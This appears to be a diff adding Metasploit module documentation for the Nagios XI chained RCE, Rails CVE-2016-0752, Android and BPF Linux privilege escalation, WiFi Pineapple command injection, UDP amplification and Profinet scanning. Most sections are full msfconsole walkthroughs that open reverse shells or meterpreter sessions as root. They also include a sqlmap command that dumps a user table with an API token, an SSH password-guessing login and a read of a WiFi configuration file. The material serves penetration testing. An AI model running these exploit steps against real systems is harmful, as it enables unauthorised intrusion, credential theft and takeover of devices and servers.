+
+[*] Printable info leaked:
+>5..).........9.................................................................x...D.#..............+#.........\.....?.L...l...........h.............#.....................l...\...........l.....X.................a.#...R....X.....y#.........x...@V$.\.............X.<....X................W....._y>..#t... .....H...X.....W.......................................>.$...........>5..).............................!.....:3.K......X.............xV4.xV4.xV4.......................................X...........X.:3.KxV4.xV4.................$...m;......xV4.xV4.xV4.xV4.xV4.xV4.xV4.xV4...........!.....<<<<........................................................................................................................................................<<<<....................$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<<<<1.......................................<<<<....9....... .......d....................Q..........<<<<....9....... ...............(............Q..........<<<<........................CI................................................................................ab_cdefg_pool...................................................................................................................................................................................ozhu7vp...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
+[+] 192.168.1.2:500 - IKE response with leak
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,76 @@
+Siemens Industrial controllers and most other industrial OEMs 
+use a proprietary protocol to discover their devices accross a network.
+In the case of Siemens this is called the Profinet Discover Protocol. 
+Known in Wireshark as PN_DCP
+
+It works purely on Layer 2 (Ethernet addresses) and sends out a single
+multicast packet (making it safe to use in sensitive networks). 
+Each profinet enabled responds with an array of information:
+- Its IP address, Subnetmask and Gateway
+- Its Profinet Devicename ('Station Name')
+- The Type of station
+- A Vendor ID (e.g. '002a'), signifing the vendor (e.g. 'Siemens')
+- A Device Role (e.g. '01'), signifing the type of device (e.g. 'IO-Controller')
+- A Device ID (e.g. '010d'), signifing the device type (e.g. 'S7-1200')
+
+## Vulnerable Application
+
+This is a hardware choice of design, and as such CANNOT be changed without
+loss of compatibility. 
+Possible mitigations include: pulling the plug (literally), using network isolation
+(Firewall, Router, IDS, IPS, network segmentation, etc...) or not allowing bad
+people on your network.
+
+Most, if not all, PLC's (computers that control engines, robots, conveyor
+belts, sensors, camera's, doorlocks, CRACs ...) have vulnerabilities where,
+using their own tools, remote configuration and programming can be done
+*WITHOUT* authentication.  Investigators and underground hackers are just now
+creating simple tools to convert the, often proprietary, protocols into simple
+scripts.  The operating word here is "proprietary". Right now, the only thing
+stopping very bad stuff from happening. 
+
+## Verification Steps
+
+The following demonstrates a basic scenario, we "detect" two devices:
+
+```
+msf > search profinet
+msf > use auxiliary/scanner/scada/profinet_siemens
+msf auxiliary(profinet_siemens) > run
+
+[*] Sending packet out to eth0
+[+] Parsing packet from 00:0e:8c:cf:7b:1a
+Type of station: ET200S CPU
+Name of station: pn-io-1
+Vendor and Device Type: Siemens, ET200S
+Device Role: IO-Controller
+IP, Subnetmask and Gateway are: 172.16.108.11, 255.255.0.0, 172.16.108.11
+
+[+] Parsing packet from 00:50:56:b6:fe:b6
+Type of station: SIMATIC-PC
+Name of station: nm
+Vendor and Device Type: Siemens, PC Simulator
+Device Role: IO-Controller
+IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
+
+[+] I found 2 devices for you!
+[*] Auxiliary module execution completed
+```
+
+## Module Options
+```
+msf auxiliary(profinet_siemens) > show options
+
+Module options (auxiliary/scanner/scada/profinet_siemens):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   INTERFACE  eth0             yes       Set an interface
+   TIMEOUT    2                yes       Seconds to wait, set longer on slower networks
+```
+
+By default, the module uses interface 'eth0', there is a check to see if it is live.
+
+The module will send out an ethernet packet and wait for responses.
+By default, it will wait 2 seconds for any responses, this is long enough for most networks.
+Increase this on larger and/or slower networks, it just increases the wait time.
@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+  Any reachable UDP endpoint is a potential target.
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Start `msfconsole`
+  2. Do: ```use auxiliary/scanner/udp/udp_amplification```
+  3. Do `set RHOSTS [targets]`, replacing ```[targets]``` with the hosts you wish to assess.
+  4. Do ```set PORTS [ports]```, replacing ```[ports]``` with the list of UDP ports you wish to assess on each asset.
+  5. Optionally, ```set PROBE [probe]```, replacing ```[probe]``` with a string or `file://` resource to serve as the UDP payload
+  6. Do: ```run```
+  7. If any of the endpoints were discovered to be vulnerable to UDP amplification with the probe you specified, status will be printed indicating as such.
+
+## Options
+
+  **PORTS**
+
+  This is the list of ports to test for UDP amplification on each host.
+  Formats like `1,2,3`, `1-3`, `1,2-3`, etc, are all supported.  You'll
+  generally only want to specify a small, targeted set of ports with an
+  appropriately tailored `PROBE` value, described below
+
+  **PROBE**
+
+  This is the payload to send in each UDP datagram. Unset or set to the empty
+  string `''` or `""` to send empty UDP datagrams, or use the `file://`
+  resource to specify a local file to serve as the UDP payload.
+
+## Scenarios
+
+  ```
+  resource (amp.rc)> use auxiliary/scanner/udp/udp_amplification
+  resource (amp.rc)> set RHOSTS 10.10.16.0/20 192.168.3.0/23
+  RHOSTS => 10.10.16.0/20 192.168.3.0/23
+  resource (amp.rc)> set PORTS 17,19,12345
+  PORTS => 17,19,12345
+  resource (amp.rc)> set THREADS 100
+  THREADS => 100
+  resource (amp.rc)> set PROBE 'test'
+  PROBE => test
+  resource (amp.rc)> run
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.16.0->10.10.16.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.18.0->10.10.18.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.20.0->10.10.20.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.21.0->10.10.21.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.22.0->10.10.22.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.23.0->10.10.23.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.24.0->10.10.24.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.25.0->10.10.25.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.27.0->10.10.27.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.28.0->10.10.28.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.29.0->10.10.29.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.30.0->10.10.30.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.31.0->10.10.31.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 192.168.3.0->192.168.3.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 192.168.4.0->192.168.4.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.17.0->10.10.17.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.19.0->10.10.19.255 (256 hosts)
+  [*] Sending 4-byte probes to 3 port(s) on 10.10.26.0->10.10.26.255 (256 hosts)
+  [*] Scanned  512 of 4608 hosts (11% complete)
+  [+] 10.10.17.153:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 10.10.20.47:17 - susceptible to UDP amplification: No packet amplification and a 40x, 159-byte bandwidth amplification
+  [*] Scanned 2560 of 4608 hosts (55% complete)
+  [+] 10.10.23.199:19 - susceptible to UDP amplification: No packet amplification and a 256x, 1020-byte bandwidth amplification
+  [+] 10.10.23.248:17 - susceptible to UDP amplification: No packet amplification and a 26x, 103-byte bandwidth amplification
+  [*] Scanned 3584 of 4608 hosts (77% complete)
+  [*] Scanned 3840 of 4608 hosts (83% complete)
+  [+] 10.10.30.202:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [*] Scanned 4096 of 4608 hosts (88% complete)
+  [+] 192.168.3.64:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.3.71:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.3.73:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.3.77:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.3.100:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.3.113:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.3.118:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [+] 192.168.4.253:19 - susceptible to UDP amplification: 2x packet amplification and a 37x, 144-byte bandwidth amplification
+  [+] 192.168.3.178:19 - susceptible to UDP amplification: No packet amplification and a 18x, 70-byte bandwidth amplification
+  [*] Scanned 4352 of 4608 hosts (94% complete)
+  [+] 192.168.4.254:19 - susceptible to UDP amplification: 2x packet amplification and a 37x, 144-byte bandwidth amplification
+  [*] Scanned 4608 of 4608 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+
+  Similarly, but with empty UDP datagrams instead:
+
+  ```
+  resource (amp.rc)> unset PROBE
+  Unsetting PROBE...
+  resource (amp.rc)> run
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.16.0->10.10.16.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.17.0->10.10.17.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.18.0->10.10.18.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.19.0->10.10.19.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.20.0->10.10.20.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.21.0->10.10.21.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.22.0->10.10.22.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.23.0->10.10.23.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.24.0->10.10.24.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.25.0->10.10.25.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.26.0->10.10.26.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.27.0->10.10.27.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.28.0->10.10.28.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.29.0->10.10.29.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.30.0->10.10.30.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 10.10.31.0->10.10.31.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 192.168.3.0->192.168.3.255 (256 hosts)
+  [*] Sending 0-byte probes to 3 port(s) on 192.168.4.0->192.168.4.255 (256 hosts)
+  [+] 10.10.17.229:17 - susceptible to UDP amplification: No packet amplification and a 107x, 107-byte bandwidth amplification
+  [+] 10.10.26.252:19 - susceptible to UDP amplification: No packet amplification and a 3892x, 3892-byte bandwidth amplification
+  [*] Scanned 4096 of 4608 hosts (88% complete)
+  [+] 192.168.3.113:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
+  [+] 192.168.3.114:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
+  [+] 192.168.3.115:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
+  [+] 192.168.3.178:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
+  [+] 192.168.3.184:19 - susceptible to UDP amplification: No packet amplification and a 74x, 74-byte bandwidth amplification
+  [*] Scanned 4352 of 4608 hosts (94% complete)
+  [+] 192.168.4.253:19 - susceptible to UDP amplification: 2x packet amplification and a 148x, 148-byte bandwidth amplification
+  [+] 192.168.4.254:19 - susceptible to UDP amplification: 2x packet amplification and a 148x, 148-byte bandwidth amplification
+  [*] Scanned 4608 of 4608 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,55 @@
+## Intro
+
+This modules exploits a vulnerability in the linux kernel on an Android device, which allows an untrusted app to elevate to root priviledges. On Android an application normally runs as an individual linux user, sandboxing it from the Android system and other applications. After running the exploit the resulting session has full priviledge on the device, and can access the entire filesystem and the private data files of every other app, including system apps.
+
+The exploit uses a read kernel memory primitive to first figure out the correct offsets for the device, before using the write primitive to overwrite the ptmx.fsync handler to a function that will elevate the current process to root. Finally /dev/ptmx is opened, and fsync called to trigger the exploit.
+
+This exploit should work on any vulnerable device and is not device specific. In the example below a Samsung Galaxy S4 running Android version 4.3 was targetted.
+
+## Usage
+
+You'll first need to obtain a session on the target device. Once the module is loaded, one simply needs to set the ```SESSION``` option and configure the handler. The exploit can take a while to run on the device so it is configured with ```WfsDelay``` option to wait 120 seconds for a session. If you have not had a session after this time you can assume the device is not vulnerable.
+
+An example session follows:
+
+
+```
+msf exploit(handler) > sessions 
+
+Active sessions
+===============
+
+  Id  Type                        Information          Connection
+  --  ----                        -----------          ----------
+  1   meterpreter dalvik/android  u0_a132 @ localhost  192.168.1.52:4444 -> 192.168.1.54:33549 (192.168.1.54)
+
+
+msf exploit(handler) > use exploit/android/local/put_user_vroot
+
+msf exploit(put_user_vroot) > set LHOST 192.168.1.52
+LHOST => 192.168.1.52
+
+msf exploit(put_user_vroot) > set LPORT 5555
+LPORT => 5555
+
+msf exploit(put_user_vroot) > set SESSION 1
+SESSION => 1
+
+msf exploit(put_user_vroot) > run
+
+[*] Started reverse TCP handler on 192.168.1.52:5555 
+[*] Loading exploit library /data/data/com.metasploit.stage/files/bwycy
+[*] Loaded library /data/data/com.metasploit.stage/files/bwycy, deleting
+[*] Waiting 120 seconds for payload
+[*] Sending stage (388156 bytes) to 192.168.1.54
+[*] Meterpreter session 2 opened (192.168.1.52:5555 -> 192.168.1.54:59580) at 2016-12-24 00:19:12 +0800
+
+
+meterpreter > getuid 
+Server username: uid=0, gid=0, euid=0, egid=0
+
+meterpreter > cat /data/misc/wifi/wpa_supplicant.conf
+ctrl_interface=wlan0
+...
+
+```
@@ -28,8 +28,22 @@ steps on the screen to configure the app.
 Configuration is actually not required to exploit the app, but you should do it
 anyway.

+## Options
+
+  **USER_ID**
+
+  If you wish to exploit a particular ```USER_ID```, that can be specified here.  Default is 1, which is most likely the admin account.
+  
+  **API_TOKEN**
+  
+  The SQLi included only works for MySQL, which should work in most cases.  However, if you experience a different backend, you can enumerate the user
+  table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
+  Then you can set the ```USER_ID``` and ```API_TOKEN``` to skip those phases and move on to exploitation.  Default is empty.  See example below for more usage.
+
 ## Usage

+### Typical Usage
+
 Just set ```RHOST``` and fire off the module! It's pretty much painless.
 ```set VERBOSE true``` if you want to see details.

@@ -71,3 +85,103 @@ uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
 uname -a
 Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 ```
+
+### Emulating a different DB
+
+#### First we'll attempt the exploit and see what happens.
+
+```
+msf exploit(nagios_xi_chained_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_chained_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   API_TOKEN                   no        If an API token was already stolen, skip the SQLi
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST      192.168.2.218    yes       The target address
+   RPORT      80               yes       The target port
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   USER_ID    1                yes       User ID in the database to target
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.117    yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nagios XI <= 5.2.7
+
+
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting API token
+[+] 0 incidents resolved in Nagios IM
+
+[-] Exploit aborted due to failure: unexpected-reply: API token not found! punt!
+[*] Exploit completed, but no session was created.
+```
+
+#### Now lets try using sqlmap to enumerate the user table.
+
+```
+root@k:~# sqlmap -u "http://192.168.2.218/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump
+...snip...
+Database: nagiosxi
+Table: xi_users
+[2 entries]
+---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| user_id | name                 | email             | enabled | username    | password                         | backend_ticket                                                   |
+---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| 2       | admin2               | admin2@admin2.com | 1       | admin2      | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g |
+---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+
+...snip...
+```
+
+#### Re-target
+Now, we can set the ```USER_ID``` and ```API_TOKEN``` (backend_ticket)
+
+```
+msf exploit(nagios_xi_chained_rce) > set USER_ID 2
+USER_ID => 2
+msf exploit(nagios_xi_chained_rce) > set API_TOKEN 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+API_TOKEN => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting admin cookie
+[+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6;
+[+] CSRF token: c53d1f591264a3ea771639a7782627f8
+[*] Getting monitored host
+[+] Monitored host: localhost
+[*] Downloading component
+[*] Uploading root shell
+[*] Popping shell!
+[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.218:51032) at 2016-10-10 10:15:08 -0400
+[*] Cleaning up...
+[*] rm -rf ../profile
+[*] unzip -qd .. ../../../../tmp/component-profile.zip
+[*] chown -R nagios:nagios ../profile
+[*] rm -f ../../../../tmp/component-ZEaGkiTW.zip
+
+1138255764
+NXEqynCVIfLzvpjUkqOovFvuLgsUrtpo
+CKorOSWlTQEkRoiwCiBqTgylyLQjuWxU
+oIGZxLofAStLsgsMNaGnQzzMuBYpJUQs
+fkUlWzVvhurgAATtxKhLSBFCxQaZqjtR
+QajRDDToeigHGMFdUbaClxkLfJbxqBKv
+whoami
+root
+```
@@ -0,0 +1,21 @@
+## Background
+
+The 'pineapple_bypass_cmdinject' exploit attacks a weak check for
+pre-authorized CSS files, which allows the attacker to bypass
+authentication. The exploit then relies on the anti-CSRF vulnerability
+(CVE-2015-4624) to obtain command injection.
+
+This exploit uses a utility function in
+/components/system/configuration/functions.php to execute commands once
+authorization has been bypassed.
+
+## Verification
+
+This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
+default options are generally effective due to having a set state after being
+flashed. You will need to be connected to the WiFi pineapple network (e.g. via
+WiFi or ethernet).
+
+Assuming the above 2.3 firmware is installed, this exploit should always work.
+If it does not, try it again. It should always work as long as the pineapple is
+in its default configuration.
@@ -0,0 +1,28 @@
+## Background
+
+This module uses a challenge solver exploit which impacts two possible states
+of the device: pre-password set and post-password set. The pre-password set
+vulnerability uses a default password and a weak anti-CSRF (CVE-2015-4624)
+check to obtain shell by logging in and pre-computing the solution to
+the anti-CSRF check.
+
+The post-password set vulnerability uses the fact that there is a 1 in 27
+chance of correctly guessing the challenge solution. This attack resets the
+password to a password chosen by the attacker (we suggest the default
+'pineapplesareyummy' to decrease collateral damage on victims) and then
+performs the same anti-CSRF attack as the pre-password vulnerability.
+
+This exploit uses a utility function in
+/components/system/configuration/functions.php to execute commands once
+authorization has been bypassed.
+
+## Verification
+
+This exploit requires a "fresh" pineapple, flashed with version 2.0-2.3. The
+default options are generally effective due to having a set state after being
+flashed. You will need to be connected to the WiFi pineapple network (e.g. via
+WiFi or ethernet).
+
+Assuming the above 2.3 firmware is installed, this exploit should always work.
+If it does not, try it again. It should always work as long as the pineapple is
+in its default configuration.
@@ -0,0 +1,79 @@
+## Intro
+
+Rails is a web application development framework written in the Ruby language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks.
+
+http://rubyonrails.org/
+
+> This module exploits the rendering vulnerability via a temporary file upload to pop a shell (CVE-2016-0752).
+
+## Setup
+
+**Download and setup the sample vuln application:**
+
+- [ ] `sudo apt-get install -y curl git`
+- [ ] `curl -L https://get.rvm.io | bash -s stable --autolibs=3 --ruby=2.3.1`
+- [ ] `source ~/.rvm/scripts/rvm`
+- [ ] `sudo apt-get install rubygems ruby-dev nodejs zlib1g-dev -y`
+- [ ] `gem install rails -v 4.0.8`
+- [ ] `git clone https://github.com/forced-request/rails-rce-cve-2016-0752 pwn`
+- [ ] `cd pwn`
+- [ ] `bundle install`
+- [ ] Edit the config/routes.rb file and add `post "users/:id", to: 'user#show'`
+
+Basically, you just need a POST endpoint for the temporary file upload trick. Now you can start the rails server and test the module.
+
+- [ ] `rails s -b 0.0.0.0` or `rails s -b 0.0.0.0 -e production`
+
+## Usage
+
+### Typical Usage
+
+Just set ```RHOST``` and fire off the module! It's pretty much painless.
+```set VERBOSE true``` if you want to see details.
+
+```
+saturn:metasploit-framework mr_me$ cat scripts/rails.rc 
+use exploit/multi/http/rails_dynamic_render_code_exec
+set RHOST 172.16.175.251
+set payload linux/x86/meterpreter/reverse_tcp
+set LHOST 172.16.175.1
+check
+exploit
+
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/rails.rc 
+[*] Processing scripts/rails.rc for ERB directives.
+resource (scripts/rails.rc)> use exploit/multi/http/rails_dynamic_render_code_exec
+resource (scripts/rails.rc)> set RHOST 172.16.175.251
+RHOST => 172.16.175.251
+resource (scripts/rails.rc)> set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+resource (scripts/rails.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/rails.rc)> check
+[+] 172.16.175.251:3000 The target is vulnerable.
+resource (scripts/rails.rc)> exploit
+[*] Exploit running as background job.
+[*] Started reverse TCP handler on 172.16.175.1:4444 
+
+[*] Sending initial request to detect exploitability
+msf exploit(rails_dynamic_render_code_exec) > [*] 172.16.175.251:3000 - Starting up our web service on http://172.16.175.1:1337/iUDaRVpz ...
+[*] Using URL: http://0.0.0.0:1337/iUDaRVpz
+[*] Local IP: http://192.168.100.13:1337/iUDaRVpz
+[*] uploading image...
+[+] injected payload
+[*] 172.16.175.251:3000 - Sending the payload to the server...
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+[*] Sending stage (1495599 bytes) to 172.16.175.251
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.251:41246) at 2016-09-29 17:52:00 -0500
+[+] Deleted /tmp/NhhGKCCIgwF
+
+msf exploit(rails_dynamic_render_code_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 50809 created.
+Channel 1 created.
+$ id
+uid=1000(student) gid=1000(student) groups=1000(student),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
+$
+```
@@ -0,0 +1,167 @@
+## Notes
+
+This module (and the original exploit) are written in several parts: hello, doubleput, and suidhelper.
+
+Mettle at times on this exploit will give back an invalid session number error.  In these cases payload/linux/x64/shell/bind_tcp seemed to always work.
+
+As of PR submission, the original shell becomes unresposive when the root shell occurs.  Metasm fails to compile due to fuse.h being required.
+
+As of PR submission, killing of the process hello and doubleput has to occur manually.  /tmp/fuse_mount also needs to be unmounted and deleted.
+
+## Creating A Testing Environment
+
+There are a few requirements for this module to work:
+
+  1. CONFIG_BPF_SYSCALL=y must be set in the kernel (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
+  2. kernel.unprivileged_bpf_disabled can't be set to 1 (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
+  3. fuse needs to be installed (non-default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
+  
+  Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!
+
+This module has been tested against:
+
+  1. Ubuntu 16.04 linux-image-4.4.0-38-generic (pre-compile & live compile)
+  2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic (pre-compile & live compile)
+
+This module was not tested against, but may work against:
+
+  1. Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
+  2. Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
+  3. Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
+  4. Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823603)
+  5. Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/bpf_priv_esc`
+  5. Do: `set session #`
+  6. Do: `set verbose true`
+  7. Do: `exploit`
+
+## Options
+
+  **MAXWAIT**
+
+  The first stage of this priv esc can take ~35seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to 120 (seconds)
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+  **COMPILE**
+  
+  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to Auto
+
+## Scenarios
+
+### Ubuntu 16.04 (with Linux 4.4.0-38-generic)
+
+#### Initial Access
+
+    msf > use auxiliary/scanner/ssh/ssh_login
+    msf auxiliary(ssh_login) > set rhosts 192.168.199.130
+    rhosts => 192.168.199.130
+    msf auxiliary(ssh_login) > set username ubuntu
+    username => ubuntu
+    msf auxiliary(ssh_login) > set password ubuntu
+    password => ubuntu
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux ubuntu 4.4.0-38-generic #57-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.199.131:39175 -> 192.168.199.130:22) at 2016-09-27 12:25:31 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+#### Escalate
+
+In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
+    msf exploit(bpf_priv_esc) > set verbose true
+    verbose => true
+    msf exploit(bpf_priv_esc) > set session 1
+    session => 1
+    msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
+    lhost => 192.168.199.131
+    msf exploit(bpf_priv_esc) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.199.131:4444 
+    [+] CONFIG_BPF_SYSCAL is set to yes
+    [+] kernel.unprivileged_bpf_disabled is NOT set to 1
+    [+] fuse is installed
+    [+] libfuse-dev is installed
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [*] Writing files to target
+    [*] Writing hello to /tmp/hello.c
+    [*] Max line length is 65537
+    [*] Writing 2760 bytes in 1 chunks of 9767 bytes (octal-encoded), using printf
+    [*] Writing doubleput to /tmp/doubleput.c
+    [*] Max line length is 65537
+    [*] Writing 5182 bytes in 1 chunks of 18218 bytes (octal-encoded), using printf
+    [*] Writing suidhelper to /tmp/suidhelper.c
+    [*] Max line length is 65537
+    [*] Writing 352 bytes in 1 chunks of 1219 bytes (octal-encoded), using printf
+    [*] Compiling all modules on target
+    [*] Writing payload to /tmp/AyDJSaMM
+    [*] Max line length is 65537
+    [*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
+    [*] Starting execution of priv esc.  This may take about 120 seconds
+    [+] got root, starting payload
+    [*] Transmitting intermediate stager...(126 bytes)
+    [*] Sending stage (2412016 bytes) to 192.168.199.130
+    [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:43734) at 2016-09-27 12:26:06 -0400
+    [*] Cleaning up...
+    
+    meterpreter > getuid
+    Server username: uid=0, gid=0, euid=0, egid=0
+    meterpreter > sysinfo
+    Computer     : 192.168.199.130
+    OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
+    Architecture : x86_64
+    Meterpreter  : x64/linux
+    
+#### Escalate w/ pre-compiled binaries
+
+It is possible to force pre-compiled binaries, however in this case we look at a system that doesn't have libfuse-dev (ubuntu) installed
+
+    msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
+    msf exploit(bpf_priv_esc) > set verbose true
+    verbose => true
+    msf exploit(bpf_priv_esc) > set session 1
+    session => 1
+    msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
+    lhost => 192.168.199.131
+    msf exploit(bpf_priv_esc) > exploit
+    
